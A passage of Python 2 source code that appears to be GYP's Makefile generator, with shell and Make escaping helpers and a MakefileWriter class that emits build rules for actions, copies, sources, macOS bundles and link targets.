"""Return true if the file is linkable (should be on the link line)."""
return filename.endswith('.o')
def Target(filename):
"""Translate a compilable filename to its .o target."""
return os.path.splitext(filename)[0] + '.o'
def EscapeShellArgument(s):
"""Quotes an argument so that it will be interpreted literally by a POSIX
shell. Taken from
http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
"""
return "'" + s.replace("'", "'\\''") + "'"
def EscapeMakeVariableExpansion(s):
"""Make has its own variable expansion syntax using $. We must escape it for
string to be interpreted literally."""
return s.replace('$', '$$')
def EscapeCppDefine(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = EscapeShellArgument(s)
s = EscapeMakeVariableExpansion(s)
# '#' characters must be escaped even embedded in a string, else Make will
# treat it as the start of a comment.
return s.replace('#', r'\#')
def QuoteIfNecessary(string):
"""TODO: Should this ideally be replaced with one or more of the above
functions?"""
if '"' in string:
string = '"' + string.replace('"', '\\"') + '"'
return string
def StringToMakefileVariable(string):
"""Convert a string to a value that is acceptable as a make variable name."""
return re.sub('[^a-zA-Z0-9_]', '_', string)
srcdir_prefix = ''
def Sourceify(path):
"""Convert a path to its source directory form."""
if '$(' in path:
return path
if os.path.isabs(path):
return path
return srcdir_prefix + path
def QuoteSpaces(s, quote=r'\ '):
return s.replace(' ', quote)
# TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in msvs.py.
def _ValidateSourcesForOSX(spec, all_sources):
"""Makes sure if duplicate basenames are not specified in the source list.
Arguments:
spec: The target dictionary containing the properties of the target.
"""
if spec.get('type', None) != 'static_library':
return
basenames = {}
for source in all_sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in [
'.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.iteritems():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
print('static library %s has several files with the same basename:\n' %
spec['target_name'] + error + 'libtool on OS X will generate' +
' warnings for them.')
raise GypError('Duplicate basenames in sources section, see list above')
# Map from qualified target to path to output.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
class MakefileWriter(object):
"""MakefileWriter packages up the writing of one target-specific foobar.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, generator_flags, flavor):
self.generator_flags = generator_flags
self.flavor = flavor
self.suffix_rules_srcdir = {}
self.suffix_rules_objdir1 = {}
self.suffix_rules_objdir2 = {}
# Generate suffix rules for all compilable extensions.
for ext in COMPILABLE_EXTENSIONS.keys():
# Suffix rules for source folder.
self.suffix_rules_srcdir.update({ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))})
# Suffix rules for generated source files.
self.suffix_rules_objdir1.update({ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))})
self.suffix_rules_objdir2.update({ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))})
def Write(self, qualified_target, base_path, output_filename, spec, configs,
part_of_all):
"""The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
base_path: path relative to source root we're building in, used to resolve
target-relative paths
output_filename: output .mk file name to write
spec, configs: gyp info
part_of_all: flag indicating this target is part of 'all'
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
self.is_mac_bundle = gyp.xcode_emulation.IsMacBundle(self.flavor, spec)
if self.flavor == 'mac':
self.xcode_settings = gyp.xcode_emulation.XcodeSettings(spec)
else:
self.xcode_settings = None
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
extra_link_deps = []
extra_mac_bundle_resources = []
mac_bundle_deps = []
if self.is_mac_bundle:
self.output = self.ComputeMacBundleOutput(spec)
self.output_binary = self.ComputeMacBundleBinaryOutput(spec)
else:
self.output = self.output_binary = self.ComputeOutput(spec)
self.is_standalone_static_library = bool(
spec.get('standalone_static_library', 0))
self._INSTALLABLE_TARGETS = ('executable', 'loadable_module',
'shared_library')
if (self.is_standalone_static_library or
self.type in self._INSTALLABLE_TARGETS):
self.alias = os.path.basename(self.output)
install_path = self._InstallableTargetInstallPath()
else:
self.alias = self.output
install_path = self.output
self.WriteLn("TOOLSET := " + self.toolset)
self.WriteLn("TARGET := " + self.target)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs, part_of_all)
# Bundle resources.
if self.is_mac_bundle:
all_mac_bundle_resources = (
spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources)
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
self.WriteMacInfoPlist(mac_bundle_deps)
# Sources.
all_sources = spec.get('sources', []) + extra_sources
if all_sources:
if self.flavor == 'mac':
# libtool on OS X generates warnings for duplicate basenames in the same
# target.
_ValidateSourcesForOSX(spec, all_sources)
self.WriteSources(
configs, deps, all_sources, extra_outputs,
extra_link_deps, part_of_all,
gyp.xcode_emulation.MacPrefixHeader(
self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)),
self.Pchify))
sources = filter(Compilable, all_sources)
if sources:
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1)
extensions = set([os.path.splitext(s)[1] for s in sources])
for ext in extensions:
if ext in self.suffix_rules_srcdir:
self.WriteLn(self.suffix_rules_srcdir[ext])
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2)
for ext in extensions:
if ext in self.suffix_rules_objdir1:
self.WriteLn(self.suffix_rules_objdir1[ext])
for ext in extensions:
if ext in self.suffix_rules_objdir2:
self.WriteLn(self.suffix_rules_objdir2[ext])
self.WriteLn('# End of this set of suffix rules')
# Add dependency from bundle to bundle binary.
if self.is_mac_bundle:
mac_bundle_deps.append(self.output_binary)
self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps,
mac_bundle_deps, extra_outputs, part_of_all)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = install_path
# Update global list of link dependencies.
if self.type in ('static_library', 'shared_library'):
target_link_deps[qualified_target] = self.output_binary
# Currently any versions have the same effect, but in future the behavior
# could be different.
if self.generator_flags.get('android_ndk_version', None):
self.WriteAndroidNdkModuleRule(self.target, all_sources, link_deps)
self.fp.close()
def WriteSubMake(self, output_filename, makefile_path, targets, build_dir):
"""Write a "sub-project" Makefile.
This is a small, wrapper Makefile that calls the top-level Makefile to build
the targets from a single gyp file (i.e. a sub-project).
Arguments:
output_filename: sub-project Makefile name to write
makefile_path: path to the top-level Makefile
targets: list of "all" targets for this sub-project
build_dir: build output directory, relative to the sub-project
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
# For consistency with other builders, put sub-project build output in the
# sub-project dir (see test/subdirectory/gyptest-subdir-all.py).
self.WriteLn('export builddir_name ?= %s' %
os.path.join(os.path.dirname(output_filename), build_dir))
self.WriteLn('.PHONY: all')
self.WriteLn('all:')
if makefile_path:
makefile_path = ' -C ' + makefile_path
self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets)))
self.fp.close()
def WriteActions(self, actions, extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for action in actions:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
dir = os.path.split(out)[0]
if dir:
dirs.add(dir)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
# Write the actual command.
action_commands = action['action']
if self.flavor == 'mac':
action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env)
for command in action_commands]
command = gyp.common.EncodePOSIXShellList(action_commands)
if 'message' in action:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message']))
else:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name))
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# command and cd_action get written to a toplevel variable called
# cmd_foo. Toplevel variables can't handle things that change per
# makefile like $(TARGET), so hardcode the target.
command = command.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the action runs an executable from this
# build which links to shared libs from this build.
# actions run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/lib.host:'
'$(builddir)/lib.target:$$LD_LIBRARY_PATH; '
'export LD_LIBRARY_PATH; '
'%s%s'
% (name, cd_action, command))
self.WriteLn()
outputs = map(self.Absolutify, outputs)
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the obj
# variable for the action rule with an absolute version so that the output
# goes in the right place.
# Only write the 'obj' and 'builddir' rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
# Same for environment.
self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0]))
self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0]))
self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv())
for input in inputs:
assert ' ' not in input, (
"Spaces in action input filenames not supported (%s)" % input)
for output in outputs:
assert ' ' not in output, (
"Spaces in action output filenames not supported (%s)" % output)
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)),
part_of_all=part_of_all, command=name)
# Stuff the outputs in a variable so we can refer to them later.
outputs_variable = 'action_%s_outputs' % name
self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs)))
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn()
self.WriteLn()
def WriteRules(self, rules, extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for rule in rules:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
rule['rule_name']))
count = 0
self.WriteLn('### Generated for rule %s:' % name)
all_outputs = []
for rule_source in rule.get('rule_sources', []):
dirs = set()
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = \
os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
for out in outputs:
dir = os.path.dirname(out)
if dir:
dirs.add(dir)
if int(rule.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(rule.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
inputs = map(Sourceify, map(self.Absolutify, [rule_source] +
rule.get('inputs', [])))
actions = ['$(call do_cmd,%s_%d)' % (name, count)]
if name == 'resources_grit':
# HACK: This is ugly. Grit intentionally doesn't touch the
# timestamp of its output file when the file doesn't change,
# which is fine in hash-based dependency systems like scons
# and forge, but not kosher in the make world. After some
# discussion, hacking around it here seems like the least
# amount of pain.
actions += ['@touch --no-create $@']
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
outputs = map(self.Absolutify, outputs)
all_outputs += outputs
# Only write the 'obj' and 'builddir' rules for the "primary" output
# (:1); it's superfluous for the "extra outputs", and this avoids
# accidentally writing duplicate dummy rules for those outputs.
self.WriteLn('%s: obj := $(abs_obj)' % outputs[0])
self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0])
self.WriteMakeRule(outputs, inputs, actions,
command="%s_%d" % (name, count))
# Spaces in rule filenames are not supported, but rule variables have
# spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)').
# The spaces within the variables are valid, so remove the variables
# before checking.
variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)')
for output in outputs:
output = re.sub(variables_with_spaces, '', output)
assert ' ' not in output, (
"Spaces in rule filenames not yet supported (%s)" % output)
self.WriteLn('all_deps += %s' % ' '.join(outputs))
action = [self.ExpandInputRoot(ac, rule_source_root,
rule_source_dirname)
for ac in rule['action']]
mkdirs = ''
if len(dirs) > 0:
mkdirs = 'mkdir -p %s; ' % ' '.join(dirs)
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# action, cd_action, and mkdirs get written to a toplevel variable
# called cmd_foo. Toplevel variables can't handle things that change
# per makefile like $(TARGET), so hardcode the target.
if self.flavor == 'mac':
action = [gyp.xcode_emulation.ExpandEnvVars(command, env)
for command in action]
action = gyp.common.EncodePOSIXShellList(action)
action = action.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
mkdirs = mkdirs.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the rule runs an executable from this
# build which links to shared libs from this build.
# rules run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn(
"cmd_%(name)s_%(count)d = LD_LIBRARY_PATH="
"$(builddir)/lib.host:$(builddir)/lib.target:$$LD_LIBRARY_PATH; "
"export LD_LIBRARY_PATH; "
"%(cd_action)s%(mkdirs)s%(action)s" % {
'action': action,
'cd_action': cd_action,
'count': count,
'mkdirs': mkdirs,
'name': name,
})
self.WriteLn(
'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % {
'count': count,
'name': name,
})
self.WriteLn()
count += 1
outputs_variable = 'rule_%s_outputs' % name
self.WriteList(all_outputs, outputs_variable)
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn('### Finished generating for rule: %s' % name)
self.WriteLn()
self.WriteLn('### Finished generating for all rules')
self.WriteLn('')
def WriteCopies(self, copies, extra_outputs, part_of_all):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Generated for copy rule.')
variable = StringToMakefileVariable(self.qualified_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# Absolutify() may call normpath, and will strip trailing slashes.
path = Sourceify(self.Absolutify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.Absolutify(os.path.join(copy['destination'],
filename)))
# If the output path has variables in it, which happens in practice for
# 'copies', writing the environment as target-local doesn't work,
# because the variables are already needed for the target name.
# Copying the environment variables into global make variables doesn't
# work either, because then the .d files will potentially contain spaces
# after variable expansion, and .d file handling cannot handle spaces.
# As a workaround, manually expand variables at gyp time. Since 'copies'
# can't run scripts, there's no need to write the env then.
# WriteDoCmd() will escape spaces for .d files.
env = self.GetSortedXcodeEnv()
output = gyp.xcode_emulation.ExpandEnvVars(output, env)
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
self.WriteDoCmd([output], [path], 'copy', part_of_all)
outputs.append(output)
self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
def WriteMacBundleResources(self, resources, bundle_deps):
"""Writes Makefile code for 'mac_bundle_resources'."""
self.WriteLn('### Generated for mac_bundle_resources')
for output, res in gyp.xcode_emulation.GetMacBundleResources(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
map(Sourceify, map(self.Absolutify, resources))):
_, ext = os.path.splitext(output)
if ext != '.xcassets':
# Make does not supports '.xcassets' emulation.
self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource',
part_of_all=True)
bundle_deps.append(output)
def WriteMacInfoPlist(self, bundle_deps):
"""Write Makefile code for bundle Info.plist files."""
info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
lambda p: Sourceify(self.Absolutify(p)))
if not info_plist:
return
if defines:
# Create an intermediate file to store preprocessed results.
intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' +
os.path.basename(info_plist))
self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D',
quoter=EscapeCppDefine)
self.WriteMakeRule([intermediate_plist], [info_plist],
['$(call do_cmd,infoplist)',
# "Convert" the plist so that any weird whitespace changes from the
# preprocessor do not affect the XML parser in mac_tool.
'@plutil -convert xml1 $@ $@'])
info_plist = intermediate_plist
# plists can contain envvars and substitute them into the file.
self.WriteSortedXcodeEnv(
out, self.GetSortedXcodeEnv(additional_settings=extra_env))
self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist',
part_of_all=True)
bundle_deps.append(out)
def WriteSources(self, configs, deps, sources,
extra_outputs, extra_link_deps,
part_of_all, precompiled_header):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
configs, deps, sources: input from gyp.
extra_outputs: a list of extra outputs this action should be dependent on;
used to serialize action/rules before compilation
extra_link_deps: a list that will be filled in with any outputs of
compilation (to be used in link lines)
part_of_all: flag indicating this target is part of 'all'
"""
# Write configuration-specific variables for CFLAGS, etc.
for configname in sorted(configs.keys()):
config = configs[configname]
self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D',
quoter=EscapeCppDefine)
if self.flavor == 'mac':
cflags = self.xcode_settings.GetCflags(configname)
cflags_c = self.xcode_settings.GetCflagsC(configname)
cflags_cc = self.xcode_settings.GetCflagsCC(configname)
cflags_objc = self.xcode_settings.GetCflagsObjC(configname)
cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname)
else:
cflags = config.get('cflags')
cflags_c = config.get('cflags_c')
cflags_cc = config.get('cflags_cc')
self.WriteLn("# Flags passed to all source files.");
self.WriteList(cflags, 'CFLAGS_%s' % configname)
self.WriteLn("# Flags passed to only C files.");
self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname)
self.WriteLn("# Flags passed to only C++ files.");
self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname)
if self.flavor == 'mac':
self.WriteLn("# Flags passed to only ObjC files.");
self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname)
self.WriteLn("# Flags passed to only ObjC++ files.");
self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname)
includes = config.get('include_dirs')
if includes:
includes = map(Sourceify, map(self.Absolutify, includes))
self.WriteList(includes, 'INCS_%s' % configname, prefix='-I')
compilable = filter(Compilable, sources)
objs = map(self.Objectify, map(self.Absolutify, map(Target, compilable)))
self.WriteList(objs, 'OBJS')
for obj in objs:
assert ' ' not in obj, (
"Spaces in object filenames not supported (%s)" % obj)
self.WriteLn('# Add to the list of files we specially track '
'dependencies for.')
self.WriteLn('all_deps += $(OBJS)')
self.WriteLn()
# Make sure our dependencies are built first.
if deps:
self.WriteMakeRule(['$(OBJS)'], deps,
comment = 'Make sure our dependencies are built '
'before any of us.',
order_only = True)
# Make sure the actions and rules run first.
# If they generate any extra headers etc., the per-.o file dep tracking
# will catch the proper rebuilds, so order only is still ok here.
if extra_outputs:
self.WriteMakeRule(['$(OBJS)'], extra_outputs,
comment = 'Make sure our actions/rules run '
'before any of us.',
order_only = True)
pchdeps = precompiled_header.GetObjDependencies(compilable, objs )
if pchdeps:
self.WriteLn('# Dependencies from obj files to their precompiled headers')
for source, obj, gch in pchdeps:
self.WriteLn('%s: %s' % (obj, gch))
self.WriteLn('# End precompiled header dependencies')
if objs:
extra_link_deps.append('$(OBJS)')
self.WriteLn("""\
# CFLAGS et al overrides must be target-local.
# See "Target-specific Variable Values" in the GNU Make manual.""")
self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)")
self.WriteLn("$(OBJS): GYP_CFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('c') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_CXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('cc') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE))")
if self.flavor == 'mac':
self.WriteLn("$(OBJS): GYP_OBJCFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('m') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE)) "
"$(CFLAGS_OBJC_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('mm') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE)) "
"$(CFLAGS_OBJCC_$(BUILDTYPE))")
self.WritePchTargets(precompiled_header.GetPchBuildCommands())
# If there are any object files in our input file list, link them into our
# output.
extra_link_deps += filter(Linkable, sources)
self.WriteLn()
def WritePchTargets(self, pch_commands):
"""Writes make rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, input in pch_commands:
extra_flags = {
'c': '$(CFLAGS_C_$(BUILDTYPE))',
'cc': '$(CFLAGS_CC_$(BUILDTYPE))',
'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))',
'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))',
}[lang]
var_name = {
'c': 'GYP_PCH_CFLAGS',
'cc': 'GYP_PCH_CXXFLAGS',
'm': 'GYP_PCH_OBJCFLAGS',
'mm': 'GYP_PCH_OBJCXXFLAGS',
}[lang]
self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) +
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"$(CFLAGS_$(BUILDTYPE)) " +
extra_flags)
self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, input))
self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang)
self.WriteLn('')
assert ' ' not in gch, (
"Spaces in gch filenames not supported (%s)" % gch)
self.WriteLn('all_deps += %s' % gch)
self.WriteLn('')
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
assert not self.is_mac_bundle
if self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
return self.xcode_settings.GetExecutablePath()
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.a'
elif self.type in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.so'
elif self.type == 'none':
target = '%s.stamp' % target
elif self.type != 'executable':
print ("ERROR: What output file should be generated?",
"type", self.type, "target", target)
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
return target_prefix + target + target_ext
def _InstallImmediately(self):
return self.toolset == 'target' and self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module')
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
assert not self.is_mac_bundle
path = os.path.join('$(obj).' + self.toolset, self.path)
if self.type == 'executable' or self._InstallImmediately():
path = '$(builddir)'
path = spec.get('product_dir', path)
return os.path.join(path, self.ComputeOutputBasename(spec))
def ComputeMacBundleOutput(self, spec):
"""Return the 'output' (full output path) to a bundle output directory."""
assert self.is_mac_bundle
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetWrapperName())
def ComputeMacBundleBinaryOutput(self, spec):
"""Return the 'output' (full output path) to the binary in a bundle."""
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetExecutablePath())
def ComputeDeps(self, spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
# TODO: It seems we need to transitively link in libraries (e.g. -lfoo)?
# This hack makes it work:
# link_deps.extend(spec.get('libraries', []))
return (gyp.common.uniquer(deps), gyp.common.uniquer(link_deps))
def WriteDependencyOnExtraOutputs(self, target, extra_outputs):
self.WriteMakeRule([self.output_binary], extra_outputs,
comment = 'Build our special outputs first.',
order_only = True)
def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps,
extra_outputs, part_of_all):
"""Write Makefile code to produce the final target of the gyp spec.
spec, configs: input from gyp.
deps, link_deps: dependency lists; see ComputeDeps()
extra_outputs: any extra outputs that our target should depend on
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Rules for final target.')
if extra_outputs:
self.WriteDependencyOnExtraOutputs(self.output_binary, extra_outputs)
self.WriteMakeRule(extra_outputs, deps,
comment=('Preserve order dependency of '
'special output on deps.'),
order_only = True)
target_postbuilds = {}
if self.type != 'none':
for configname in sorted(configs.keys()):
config = configs[configname]
if self.flavor == 'mac':
ldflags = self.xcode_settings.GetLdflags(configname,
generator_default_variables['PRODUCT_DIR'],
lambda p: Sourceify(self.Absolutify(p)))
# TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on.
gyp_to_build = gyp.common.InvertRelativePath(self.path)
target_postbuild = self.xcode_settings.AddImplicitPostbuilds(
configname,
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build,
self.output))),
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build,
self.output_binary))))
if target_postbuild:
target_postbuilds[configname] = target_postbuild
else:
ldflags = config.get('ldflags', [])
# Compute an rpath for this output if needed.
if any(dep.endswith('.so') or '.so.' in dep for dep in deps):
# We want to get the literal string "$ORIGIN" into the link command,
# so we need lots of escaping.
ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset)
ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' %
self.toolset)
library_dirs = config.get('library_dirs', [])
ldflags += [('-L%s' % library_dir) for library_dir in library_dirs]
self.WriteList(ldflags, 'LDFLAGS_%s' % configname)
if self.flavor == 'mac':
self.WriteList(self.xcode_settings.GetLibtoolflags(configname),
'LIBTOOLFLAGS_%s' % configname)
libraries = spec.get('libraries')
if libraries:
# Remove duplicate entries
libraries = gyp.common.uniquer(libraries)
if self.flavor == 'mac':
libraries = self.xcode_settings.AdjustLibraries(libraries)
self.WriteList(libraries, 'LIBS')
self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' %
QuoteSpaces(self.output_binary))
self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary))
if self.flavor == 'mac':
self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' %
QuoteSpaces(self.output_binary))
# Postbuild actions. Like actions, but implicitly depend on the target's
# output.
postbuilds = []
if self.flavor == 'mac':
if target_postbuilds:
postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))')
postbuilds.extend(
gyp.xcode_emulation.GetSpecPostbuildCommands(spec))
if postbuilds:
# Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE),
# so we must output its definition first, since we declare variables
# using ":=".
